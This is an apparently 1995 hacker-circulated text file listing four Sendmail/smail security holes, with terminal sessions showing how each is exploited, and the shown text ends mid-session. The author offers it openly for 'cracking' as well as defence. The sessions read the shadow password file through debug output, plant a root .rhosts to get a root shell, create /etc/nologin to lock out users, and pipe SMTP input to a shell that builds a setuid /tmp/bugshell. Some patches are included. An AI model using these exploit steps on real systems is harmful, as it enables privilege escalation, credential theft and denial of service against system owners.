from Hacknet, Postmaster@hacknet.demon.co.uk
Introduction and Legal Ramble
This is written for anyone thats interested in learning about the many Security holes that are resident in many versions of
Sendmail. I do not care if you use it to protect your system against others, or crack other ppls systems...just don't involve me in
it.
I wrote it to collate all the information on sendmail into one list for convience and perhaps it will help some people.
I would like to thank the unknown person who started this off long time ago....
This paper is (c) 1995, however I do not object, to you including any of these in a FAQ, printed magazine, book etc... just mail
me first so I known where it's distributed *:^)
Have you spotted a mistake or anything I could add? Then just add your own stuff and put yourself down on the credits and
mail it me :)
Note: This is v.01b so there is bound to be mistakes and there are a lot of other stuff to add as well....and expand it to include
FTP daemon bugs?
I am extremely busy..and am only releasing it due to popular demand.
OH, please tell me what versions these work on!
Bug #1
Sendmail Version affected: 3.1.28, any more ?
SYNOPSIS
Use of ~/.forward and debug lets a local user read any file on the system.
EXAMPLE OF EXPLOITATION
Contrary to popular belief, adding -smtp_debup to your smail config file will not prevent this bug from occuring. It will just
prevent exploitation via the smtp port.
We can just do this....
user@psyops ~> smail -bs -v20
expand_string($primary_name Smail$version ready for mail on $date,(null),
(null)) called
expand_string returns psyops.warez.mil Smail3.1.28.1 ready for mail on
Mon, 5 Sep 94 12:15 PDT
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:15
PDT
expn user
[same text as before]
expand_string(~/.forward, /home/user, user) called
expand_string returns /home/user/.forward
dtd_forwardfile: opening forward file /home/user/.forward
[more of same text]
read 890 bytes
director dotforward: matched user, forwarded to
root:e.fmSewuS32sfeVdsjk/Ewef:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
user:e74fds.Sfdsioa8e2dsskDSx:8000:0:99999:7:::
[.....]
process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 user ... not matched
quit
221 psyops.warez.mil closing connection
To fix this, you should get rid of the -d and -v options for smail as well as adding -smtp_debug to your config file.
Bug #2
Sendmail Version affected: 3.1.28, any more ?
SYNOPSIS
Smail called with the -D flag will allow you to create and append to any file on the system.
EXAMPLE OF EXPLOITATION
user@psyops ~> cat > ~/.forward
localhost user
^D
user@psyops ~> smail -bs -D ~root/.rhosts -v20
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12
:23 PDT
expn user
250 user
quit
221 psyops.warez.mil closing connection
user@psyops ~> rsh -l root localhost tcsh\ -i
Warning: no access to tty (Bad file number).
Thus no job control in this shell.
# id
uid=3D0(root) gid=3D0(root)
Patch this by removing the -D option from smail.
I received the following patch recently. I haven't tested it, so use at your own risk.
*** Omain.c Wed Mar 11 12:33:18 1993
--- main.c Wed Mar 11 12:59:54 1993
***************
*** 436,458 ****
}
- /*
- * change error file to debugging file from -D option, if any
- */
-
- if (arg_debug_file) {
- new_errfile =3D fopen(arg_debug_file, "a");
- if (new_errfile =3D=3D NULL) {
- write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
- arg_debug_file, strerrno(errno));
- arg_debug_file =3D NULL;
- } else {
- errfile =3D new_errfile;
- fprintf(errfile, "\n%s: Debugging started: pid=3D%ld\n\n",
- program, (long)getpid());
- }
- }
/*
* read in the transport, router and director files, if needed
*
* NOTE: if queue_only is FALSE and mode is DELIVER_MAIL,
--- 436,441 ----
***************
*** 525,530 ****
--- 508,537 ----
if (prog_euid !=3D REQUIRED_EUID)
queue_only =3D TRUE;
#endif
+ /*
+ * change error file to debugging file from -D option, if any
+ *
+ * JMJ: Change location of this fragment to below the setuid/setgid
+ * calls to allow for use of fopen_as_user() instead of just
+ * fopen().
+ *
+ * Side effect: -D now requires full pathname to debug file
+ */
+
+ if (arg_debug_file) {
+ new_errfile =3D fopen_as_user(arg_debug_file, "a", 1, real_uid,
+ prog_egid, 0600);
+ write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
+ arg_debug_file, strerrno(errno));
+ arg_debug_file =3D NULL;
+ } else {
+ errfile =3D new_errfile;
+ fprintf(errfile, "\n%s: Debugging started: pid=3D%ld\n\n",
+ program, (long)getpid());
+ }
+ }
/*
* error processing can be other than TERMINAL only for
Bug #3
Sendmail Version affected: ?
SYNOPSIS
Files specified in ~/.forward can be created in any directory, regardless of it's permissions. (File is still owned by mailbox
owner, however.)
EXAMPLE OF EXPLOITATION
user@psyops ~> echo "/etc/nologin" > ~/.forward
user@psyops ~> mail -r root user < /dev/null
user@psyops ~> echo "Site shutdown due to smail lameness" >! /etc/no=
login
user@psyops ~> rlogin localhost
Site shutdown due to smail lameness
rlogin: connection closed.
Plug up this hole by adding 'check_path' to the following part of your /usr/lib/smail/transports file:
[...]
# file - deliver mail to files
#
# This is used implicitly when smail encounters addresses which begin with
# a slash or squiggle character, such as "/usr/info/list_messages" or
# perhaps "~/Mail/inbox".
file: driver =3D appendfile,
return_path, local, from, unix_from_hack;
file =3D $user, # file is taken from address
append_as_user, # use user-id associated with address
expand_user, # expand ~ and $ within address
check_path, #<--add this line
suffix =3D "\n",
mode =3D 0644
[....]
BUG #4
Version affected: 5.65?
from CSC FAQ:
A SAMPLE EXPLOITATION
A sample session follows.
---cut here
[panix!jhawk] |% telnet panix.com 25
Trying 198.7.0.2 ...
Connected to panix.com.
Escape character is '^]'.
220 panix.com 5.65c/IDA-1.4.4 Sendmail is ready at Mon, 8 Nov 1993 19:41:13
-0500
HELO
250 Hello panix.com, why do you call yourself ?
MAIL FROM: |/usr/ucb/tail|/usr/bin/sh
250 |/usr/ucb/tail|/usr/bin/sh... Sender ok
RCPT TO: root
250 root... Recipient ok
DATA
354 Enter mail, end with @.@ on a line by itself
From: jhawk"panix.com (John Hawkinson)
To: jhawk"panix.com (John Hawkinson)
Return-Receipt-To: |foobar
Subject: This is a large hole in the ground.
X-Disclaimer: We take no responsibility for what might happen
Hi there. Wanna play ball?
#!/bin/sh
#The above line is just in case :-)
echo This is a Serious Bug > /tmp/bug
echo id reports: >> /tmp/bug
/usr/bin/id >> /tmp/bug
echo Fixing this would be good >> /tmp/bug
cp /bin/sh /tmp/bugshell
chmod u+s /tmp/bugshell
echo /tmp/bugshell contains a setuid daemon shell >> /tmp/bug
chmod ugo+rx /tmp/bugshell